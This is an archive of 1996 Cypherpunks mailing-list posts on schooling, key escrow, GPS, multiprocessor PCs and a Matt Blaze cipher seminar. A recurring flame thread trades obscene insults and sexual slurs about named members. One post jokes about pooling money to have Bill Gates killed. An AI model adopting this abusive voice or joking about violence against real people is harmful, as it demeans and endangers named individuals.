>   Swedish Communications Minister Ines Uusmann told reporters that EU
>   countries needed to exchange ideas and to speak with one voice in
>   tackling a global problem.
   
[...]

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 30 Sep 1996 13:30:46 +0800
To: "attila" <attila@primenet.com>
Subject: Re: Public Schools
Message-ID: <19960930035040656.AAA252@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Sep 96 07:55:34 +0000, attila wrote:

>- "That's our advantage at Microsoft; 
>-   we set the standards and we can change them."
>-       --- Karen Hargrove, Microsoft 
>-           (quoted in the Feb 1993 Unix Review editorial)
>-
>        and, if this is not the gawd-awful truth, I must have just got
>    off the bus...  typical, typical MS arrogance. 
>        a toast! a toast to their early demise!

Now there'd be an almost acceptable use of AP!  I bet Team OS/2 alone would
contribute enough to paste billg. Not to mention what IBM or Sun or Apple or
Lotus or Borland or [company that got screwed] would do. <g>

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 30 Sep 1996 14:03:22 +0800
To: "Adamsc" <wombat@mcfeely.bsfs.org>
Subject: Re: [RANT] Re: Workers, Public Schools, Tradesmen, and Justice
Message-ID: <19960930035040656.AAB252@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Sep 1996 13:26:08 -0400 (EDT), Rabid Wombat wrote:


>> The old way was that your HS provided what the mythical average person needed
>> to go about life. College was for the more "complex" careers.

>Perhaps "high school" should end at age 16, with two years of publicly
>funded "junior college" or "technical school" available to those who
>select one or the other, and qualify. This would bring an adult-level
>decision earlier in life, and students would need to start thinking about
>which path to chose at about 14. Perhaps this would allow reality to set
>in at an earlier age. A high school diploma has become meaningless anyway 
>- it is viewed as a "right."   

How about a real simple rule:  if you don't pass a standardized test (Call it
the SATs w/800 of 1600 minimum) you repeat the grade -  no maximum age!  
Might end some of those "easy A" classes I took.

>This wouldn't leave anyone condemned to a life of menial labor for a
>decision made at age 16 - there are plenty of successful people who have
>obtained a G.E.D. later in life, and then gone on to college. It would, 
>however, give some measure of responsibility to the near-adult.

Yeah.  I'd still say that you'd want to make it pretty easy to switch over - 
I've known a few people who were massively flip-flopping.  Also, some kids
may have hard times (parents divorce, etc) that might screw up their
judgement for awhile. . .
>fiance did drop out of high school at age 16 and started college, with her
>parent's blessing. All her high school guidence counselor could come up 
>with was "But she'll miss her prom"! 
<g>  That seemed to be the general focus last year...  "We may be idiots but
we have school spirit!"

In CA, isn't there the option of taking CHSPE (sp?)  that is like a GED but
instead of sending the "I don't want this" message is more like "I don't want
to waste my time"?

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Troy Varange <varange@crl.com>
Date: Mon, 30 Sep 1996 14:02:13 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May
In-Reply-To: <ueP2uD86w165w@bwalk.dm.com>
Message-ID: <199609300332.AA09870@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


>                    berserk
> Timmy May has gone        . Has he been eating speed?
>                    bananas
> 
> >From: Troy Varange <varange@crl.com>
> >Message-Id: <199609300138.AA08482@crl12.crl.com>
> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May
> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT)
> >In-Reply-To: <FFi2uD82w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm
> >X-Mailer: ELM [version 2.4 PL23]
> >Mime-Version: 1.0
> >Content-Type: text/plain; charset=US-ASCII
> >Content-Transfer-Encoding: 7bit
> >Content-Length: 3442
> >
> >>
> >> What has Timmy been smoking?
> >>
> >> ]From paul@fatmans.demon.co.uk  Sun Sep 29 19:03:40 1996
> >> ]Received: by bwalk.dm.com (1.65/waf)
> >> ]	via UUCP; Sun, 29 Sep 96 19:14:06 EDT
> >> ]	for dlv
> >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
> >> ]        id AA25790 for dlv@bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400
> >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ac16129;
> >> ]          29 Sep 96 15:59 BST
> >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
> >> ]           id aa09441; 29 Sep 96 15:54 BST
> >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
> >> ]	id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000
> >> ]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
> >> ]From: paul@fatmans.demon.co.uk
> >> ]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
> >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000
> >> ]Mime-Version: 1.0
> >> ]Content-Type: text/plain; charset=US-ASCII
> >> ]Content-Transfer-Encoding: 7BIT
> >> ]Subject: Re: Possible subs attack????
> >> ]Priority: normal
> >> ]X-Pm-Encryptor: JN-PGP-P, 4
> >> ]X-Mailer: Pegasus Mail for Windows (v2.31)
> >> ]Message-Id: <844008901.9441.0@fatmans.demon.co.uk>
> >> ]
> >> ]-----BEGIN PGP SIGNED MESSAGE-----
> >> ]
> >> ]
> >> ]> The lying sack of shit Timmy May <paul@fatmans.demon.co.uk> writes:
> >> ]
> >> ]> The lying sack of shit Timmy May lies again, as usual.
> >> ]
> >> ]Fuck you,
> >> ]
> >> ]I am not Tim May, Check out the return path if you don`t believe me,
> >> ]if you still don`t here`s my PGP public key signed by the EFF, they
> >> ]don`t sign keys here and there without checking ID`s...
> >> ]
> >> ]Type Bits/KeyID    Date       User ID
> >> ]pub  1024/5BBFAEB1 1996/07/30 Paul Bradley <paul@fatmans.demon.co.uk>
> >> ]
> >> ]- -----BEGIN PGP PUBLIC KEY BLOCK-----
> >> ]Version: 2.6.3ia
> >> ]
> >> ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
> >> ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
> >> ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
> >> ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
> >> ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
> >> ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
> >> ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
> >> ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
> >> ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
> >> ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
> >> ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
> >> ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
> >> ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
> >> ]mUqFH41Z7NkyO8ZFdi5GGX0=
> >> ]=CMZA
> >> ]- -----END PGP PUBLIC KEY BLOCK-----
> >> ]
> >> ]
> >> ]
> >> ]-----BEGIN PGP SIGNATURE-----
> >> ]Version: 2.6.3ia
> >> ]Charset: cp850
> >> ]
> >> ]iQCVAwUBMkzuH75OPIRbv66xAQHSmQQAqw0F/lIsCcQwOpiSQDx4hMqOVVUVXbyR
> >> ]3RMWY20ECE0TpAtJ6hkAiqphsWUSBqiFj2kGHMh+jHSHXIMPF+m1qtwVbgutJC7B
> >> ]8VYWj0VP+bGu5dEUisLrVHDNj5ucEIDyK2GnqObiCiKARFUbOuZnMQOp9TDJqibh
> >> ]2Wqa5+h8R7g=
> >> ]=/M2U
> >> ]-----END PGP SIGNATURE-----
> >> ]
> >> ]  Datacomms Technologies web authoring and data security
> >> ]       Paul Bradley, Paul@fatmans.demon.co.uk
> >> ]  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org
> >> ]       Http://www.cryptography.home.ml.org/
> >> ]      Email for PGP public key, ID: 5BBFAEB1
> >> ]     "Don`t forget to mount a scratch monkey"
> >>
> >Fuckhead.
> 
Fuckhead.  We know your behind Vulis, Cock-sucker




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dustbin Freedom Remailer <dustman@athensnet.com>
Date: Mon, 30 Sep 1996 11:24:26 +0800
To: cypherpunks@toad.com
Subject: Re: Key-Escrow
In-Reply-To: <960929141327_113858214@emout06.mail.aol.com>
Message-ID: <199609300025.UAA09373@godzilla.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


: Couldn't one burn off maybe 10 ** 200 keys and say, hey gubermint dude, these
: are like, gonna be my keys.

At 15 bucks a pop, even Bill Gates couldn't afford to register that
many keys.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Mon, 30 Sep 1996 13:15:05 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Does any body know anything about this?
Message-ID: <01BBAE45.DD7DB480@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Snakeoil?
Matt Blaze?

Where _you_ been, cowboy?



----------
From: 	John Anonymous MacDonald[SMTP:nobody@cypherpunks.ca]
Sent: 	Sunday, September 29, 1996 2:38 PM
To: 	cypherpunks@toad.com
Subject: 	Does any body know anything about this?

Is this just more snakeoil or is this real?

<<<<<<<< FORWARDED MESSAGE >>>>>>>>
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
Date: Fri, 20 Sep 1996 09:05:28 +0100
Subject: Seminar in Cryptology and Computer Security

                         ***   ***   ***   ***   ***


                  University of Cambridge Computer Laboratory

                                EXTRA SEMINAR

SPEAKER:        Matt Blaze
                AT&T Research

DATE:           Monday 23rd September 1996 at 11.30 am

PLACE:          Room TP4, Computer Laboratory

TITLE:          SYMMETRIC-KEY CIPHERS BASED ON HARD PROBLEMS

A useful principle in cipher design is to reduce or at least relate
closely the cryptanalysis of the cipher to some long-studied problem
that is believed to be difficult.  Most public-key ciphers follow this
principle fairly closely (e.g., RSA is at least similar to factoring).
Modern symmetric-key ciphers, on the other hand, can rarely be reduced
in this way and so are frequently designed specifically to resist the
various known cryptanalytic attacks.  In this informal talk, we examine
a simple cipher primitive, based on Feistel networks, for which recovery
of its internal state given its inputs and outputs is NP-complete.  We
outline simple and efficient block- and stream- cipher constructions
based on this primitive.

                        *       *       *

The regular Michaelmas term seminar series will resume on the 8th
October with a series of talks on Tuesday afternoons at 4.15 PM in room 
TP4, Computer Laboratory, Pembroke Street, Cambridge. A list of speakers
will be circulated shortly.

                        *       *       *







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 30 Sep 1996 13:39:25 +0800
To: "tcmay@got.net>
Subject: Re: The Petaflops Boondoggle Computer (was PET_ard)
Message-ID: <19960930035040656.AAC252@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Sep 1996 12:16:27 -0800, Timothy C. May wrote:

>Symmetric multiprocessing is available, but it's often much less hassle to
>have a single CPU running at 200 MHz than to try games with multiple
>processors (which means more PCB real estate, more sockets, more of other
>things).

As far as SMP goes, it's actually not all that expensive.  People in the
linux-smp list have reported differences of as little as $50 for a
uniprocessor vs. dual pentium system.   Of course, every so often we'll get a
message about a $30,000 system that can handle up to <drool>64 Pentium
Pros</drool>! 

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Mon, 30 Sep 1996 11:35:12 +0800
To: cypherpunks@toad.com
Subject: Re: GPS [MARGINAL, at best]
Message-ID: <Pine.OSF.3.91.960929210222.31190B-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


There was an article in _Scientific American_ February 1996 about GPS.  I 
couldn't find the magazine, but they had this squib on the www.sciam.com 
website:

  'The Global Positioning System'
  Thomas A. Herring
  Two dozen satellites hovering thousands of miles up can locate your 
  position on the earth's surface to within a few centimeters. 
  Originally constructed for military applications, this network of 
  space beacons today finds civilian applications--such as landing 
  airplanes in fog--that demand accuracy beyond what its designers had 
  thought would be technically possible.

According to the website, there was also a letter in the June 1996 issue 
responding to Herring's article.  Here it is:

  MILITARY ADVANTAGE 

  I was pleased when I first saw your February article "The Global 
  Positioning System," by Thomas A. Herring. As developers and operators 
  of GPS, we in the Department of Defense and our partners in industry 
  are justifiably proud of the technology. GPS represents the best of 
  American scientific and technical ingenuity as well as being an 
  excellent example of cooperation between the military and civilian 
  sectors. But after reading the entire article, I was disappointed by 
  its unbalanced discussion of the national security aspects of GPS. 

  Yes, the Defense Department does operate GPS with unpopular security 
  features. But these features were not designed to inconvenience the 
  peaceful users of the system, as Herring implies. Rather they were 
  designed to provide U.S. and allied forces with a crucial military 
  edge. Furthermore, the Defense Department is well aware that the 
  security aspects of GPS are an additional burden for many users. And 
  while we believe such measures are still needed at this time to help 
  preserve our military advantage, we have set a goal of discontinuing 
  regular use of the feature known as Selective Availability, the 
  component that degrades GPS accuracy, within a decade. 

  Both time and resources are needed to replace the advantages Selective 
  Availability provides. In light of the revolutionary contributions of 
  GPS to both military and commercial enterprise, Herring could have 
  portrayed the technology in a more evenhanded manner. 

  PAUL G. KAMINSKI 
  Under Secretary 
  Department of Defense 

-- end of quoted material --

The article, as I recall, was about ways in which civilian users have 
found, or are finding, ways around the built-in inaccuarcy of the GPS.

I don't recall whether crypto was mentioned in the article.  My 
recollection of it was that they had been diddling with the timers or the 
clock signal or something, as opposed to encrypting anything.  But then 
again it has been a while, and my memory of it isn't too clear.

I seem to remember another crypto scheme discussed here at length about 
GPS, based on a paper by Dr. Dorothy [?] Denning, which involved having 
the intended recipient's coordinates - which were somehow involved in the 
encryption.  

The coordinates are in 3-D.  Spheres centered on three of the GPS
satellites intersect within a very small space. 
-- 
 public service announcement:
-------------------------------------------------------------
To remove yourself from the cypherpunks mailing list send to:
                   majordomo@toad.com
           a message that contains the text:
                 unsubscribe cypherpunks
     in the body of the message, not the subject line.
--------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 30 Sep 1996 14:18:56 +0800
To: cypherpunks@toad.com
Subject: Re: [CRYPTO] Does any body know anything about this?
Message-ID: <199609300436.VAA08532@netcomsv.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:38 PM 9/29/96 -0700, some nobody wrote:
>Is this just more snakeoil or is this real?

Neither Matt Blaze nor Ross Anderson are particularly on the
pro-snake-oil side....  Sounds like an interesting talk and I'd
enjoy being there for a variety of reasons, including being able
to time-travel back to Last Monday :-)  One difference between
snake oil salesmen and mathematical cryptographers is that
the latter talk about what they're doing, why it's as strong
as it is, and how it relates back to other known hard problems
or attack techniques.  If this is sufficiently hard, cool.

Most of the symmetric-key attacks these days are based on being
sufficiently messy to be hard to attack, and on resisting known
attacks, but there's no particular way to prove how hard they are -
you can just show that they're messier than any currently known
techniques can untangle.  On the other hand, the experience with
most public-key techniques is that it's hard to adapt NP-hard 
problems to crypto in ways that don't introduce special forms
that can fall apart when handled right - the knapsack problem
was a good example.  Factoring and discrete-log still appear to
be hard problems, but it would be nice to have other known-hard
public-key systems.  It would also be nice to have private-key
systems that use NP-hard problems in strong ways, especially if
it doesn't make them appallingly slow :-)



>TITLE:          SYMMETRIC-KEY CIPHERS BASED ON HARD PROBLEMS
>A useful principle in cipher design is to reduce or at least relate
>closely the cryptanalysis of the cipher to some long-studied problem
>that is believed to be difficult.  Most public-key ciphers follow this
>principle fairly closely (e.g., RSA is at least similar to factoring).
>Modern symmetric-key ciphers, on the other hand, can rarely be reduced
>in this way and so are frequently designed specifically to resist the
>various known cryptanalytic attacks.  In this informal talk, we examine
>a simple cipher primitive, based on Feistel networks, for which recovery
>of its internal state given its inputs and outputs is NP-complete.  We
>outline simple and efficient block- and stream- cipher constructions
>based on this primitive.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Troy Varange <varange@crl.com>
Date: Mon, 30 Sep 1996 15:02:34 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Vulis FUCKHEAD sucks Timmy's Cock
In-Reply-To: <LJV2uD91w165w@bwalk.dm.com>
Message-ID: <199609300441.AA10704@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


Vulis sucks Timmy's boyfriend's cock.
> 
> Timmy May has no life.
> 
> >From: Troy Varange <varange@crl.com>
> >Message-Id: <199609300332.AA09870@crl12.crl.com>
> >Subject: Re: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May
> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> >Date: Sun, 29 Sep 1996 20:32:58 -0700 (PDT)
> >In-Reply-To: <ueP2uD86w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 09:45:41 pm
> >X-Mailer: ELM [version 2.4 PL23]
> >Mime-Version: 1.0
> >Content-Type: text/plain; charset=US-ASCII
> >Content-Transfer-Encoding: 7bit
> >Content-Length: 4378
> >
> >>                    berserk
> >> Timmy May has gone        . Has he been eating speed?
> >>                    bananas
> >>
> >> >From: Troy Varange <varange@crl.com>
> >> >Message-Id: <199609300138.AA08482@crl12.crl.com>
> >> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May
> >> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> >> >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT)
> >> >In-Reply-To: <FFi2uD82w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm
> >> >X-Mailer: ELM [version 2.4 PL23]
> >> >Mime-Version: 1.0
> >> >Content-Type: text/plain; charset=US-ASCII
> >> >Content-Transfer-Encoding: 7bit
> >> >Content-Length: 3442
> >> >
> >> >>
> >> >> What has Timmy been smoking?
> >> >>
> >> >> ]From paul@fatmans.demon.co.uk  Sun Sep 29 19:03:40 1996
> >> >> ]Received: by bwalk.dm.com (1.65/waf)
> >> >> ]	via UUCP; Sun, 29 Sep 96 19:14:06 EDT
> >> >> ]	for dlv
> >> >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
> >> >> ]        id AA25790 for dlv@bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400
> >> >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ac16129;
> >> >> ]          29 Sep 96 15:59 BST
> >> >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
> >> >> ]           id aa09441; 29 Sep 96 15:54 BST
> >> >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
> >> >> ]	id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000
> >> >> ]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
> >> >> ]From: paul@fatmans.demon.co.uk
> >> >> ]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
> >> >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000
> >> >> ]Mime-Version: 1.0
> >> >> ]Content-Type: text/plain; charset=US-ASCII
> >> >> ]Content-Transfer-Encoding: 7BIT
> >> >> ]Subject: Re: Possible subs attack????
> >> >> ]Priority: normal
> >> >> ]X-Pm-Encryptor: JN-PGP-P, 4
> >> >> ]X-Mailer: Pegasus Mail for Windows (v2.31)
> >> >> ]Message-Id: <844008901.9441.0@fatmans.demon.co.uk>
> >> >> ]
> >> >> ]-----BEGIN PGP SIGNED MESSAGE-----
> >> >> ]
> >> >> ]
> >> >> ]> The lying sack of shit Timmy May <paul@fatmans.demon.co.uk> writes:
> >> >> ]
> >> >> ]> The lying sack of shit Timmy May lies again, as usual.
> >> >> ]
> >> >> ]Fuck you,
> >> >> ]
> >> >> ]I am not Tim May, Check out the return path if you don`t believe me,
> >> >> ]if you still don`t here`s my PGP public key signed by the EFF, they
> >> >> ]don`t sign keys here and there without checking ID`s...
> >> >> ]
> >> >> ]Type Bits/KeyID    Date       User ID
> >> >> ]pub  1024/5BBFAEB1 1996/07/30 Paul Bradley <paul@fatmans.demon.co.uk>
> >> >> ]
> >> >> ]- -----BEGIN PGP PUBLIC KEY BLOCK-----
> >> >> ]Version: 2.6.3ia
> >> >> ]
> >> >> ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
> >> >> ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
> >> >> ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
> >> >> ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
> >> >> ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
> >> >> ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
> >> >> ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
> >> >> ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
> >> >> ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
> >> >> ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
> >> >> ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
> >> >> ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
> >> >> ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
> >> >> ]mUqFH41Z7NkyO8ZFdi5GGX0=
> >> >> ]=CMZA
> >> >> ]- -----END PGP PUBLIC KEY BLOCK-----
> >> >> ]
> >> >> ]
> >> >> ]
> >> >> ]-----BEGIN PGP SIGNATURE-----
> >> >> ]Version: 2.6.3ia
> >> >> ]Charset: cp850
> >> >> ]
> >> >> ]iQCVAwUBMkzuH75OPIRbv66xAQHSmQQAqw0F/lIsCcQwOpiSQDx4hMqOVVUVXbyR
> >> >> ]3RMWY20ECE0TpAtJ6hkAiqphsWUSBqiFj2kGHMh+jHSHXIMPF+m1qtwVbgutJC7B
> >> >> ]8VYWj0VP+bGu5dEUisLrVHDNj5ucEIDyK2GnqObiCiKARFUbOuZnMQOp9TDJqibh
> >> >> ]2Wqa5+h8R7g=
> >> >> ]=/M2U
> >> >> ]-----END PGP SIGNATURE-----
> >> >> ]
> >> >> ]  Datacomms Technologies web authoring and data security
> >> >> ]       Paul Bradley, Paul@fatmans.demon.co.uk
> >> >> ]  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org
> >> >> ]       Http://www.cryptography.home.ml.org/
> >> >> ]      Email for PGP public key, ID: 5BBFAEB1
> >> >> ]     "Don`t forget to mount a scratch monkey"
> >> >>
> >> >Fuckhead.
> >>
> >Fuckhead.  We know your behind Vulis, Cock-sucker
> 
and he swallows




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 30 Sep 1996 12:44:36 +0800
To: cypherpunks@toad.com
Subject: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May
In-Reply-To: <199609300138.AA08482@crl12.crl.com>
Message-ID: <ueP2uD86w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


                   berserk
Timmy May has gone        . Has he been eating speed?
                   bananas

>From: Troy Varange <varange@crl.com>
>Message-Id: <199609300138.AA08482@crl12.crl.com>
>Subject: Re: [SPAM] More fan mail from Timmy "peteur" May
>To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT)
>In-Reply-To: <FFi2uD82w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm
>X-Mailer: ELM [version 2.4 PL23]
>Mime-Version: 1.0
>Content-Type: text/plain; charset=US-ASCII
>Content-Transfer-Encoding: 7bit
>Content-Length: 3442
>
>>
>> What has Timmy been smoking?
>>
>> ]From paul@fatmans.demon.co.uk  Sun Sep 29 19:03:40 1996
>> ]Received: by bwalk.dm.com (1.65/waf)
>> ]	via UUCP; Sun, 29 Sep 96 19:14:06 EDT
>> ]	for dlv
>> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
>> ]        id AA25790 for dlv@bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400
>> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ac16129;
>> ]          29 Sep 96 15:59 BST
>> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
>> ]           id aa09441; 29 Sep 96 15:54 BST
>> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
>> ]	id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000
>> ]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
>> ]From: paul@fatmans.demon.co.uk
>> ]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
>> ]Date: Sat, 28 Sep 1996 09:21:37 +0000
>> ]Mime-Version: 1.0
>> ]Content-Type: text/plain; charset=US-ASCII
>> ]Content-Transfer-Encoding: 7BIT
>> ]Subject: Re: Possible subs attack????
>> ]Priority: normal
>> ]X-Pm-Encryptor: JN-PGP-P, 4
>> ]X-Mailer: Pegasus Mail for Windows (v2.31)
>> ]Message-Id: <844008901.9441.0@fatmans.demon.co.uk>
>> ]
>> ]-----BEGIN PGP SIGNED MESSAGE-----
>> ]
>> ]
>> ]> The lying sack of shit Timmy May <paul@fatmans.demon.co.uk> writes:
>> ]
>> ]> The lying sack of shit Timmy May lies again, as usual.
>> ]
>> ]Fuck you,
>> ]
>> ]I am not Tim May, Check out the return path if you don`t believe me,
>> ]if you still don`t here`s my PGP public key signed by the EFF, they
>> ]don`t sign keys here and there without checking ID`s...
>> ]
>> ]Type Bits/KeyID    Date       User ID
>> ]pub  1024/5BBFAEB1 1996/07/30 Paul Bradley <paul@fatmans.demon.co.uk>
>> ]
>> ]- -----BEGIN PGP PUBLIC KEY BLOCK-----
>> ]Version: 2.6.3ia
>> ]
>> ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
>> ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
>> ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
>> ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
>> ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
>> ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
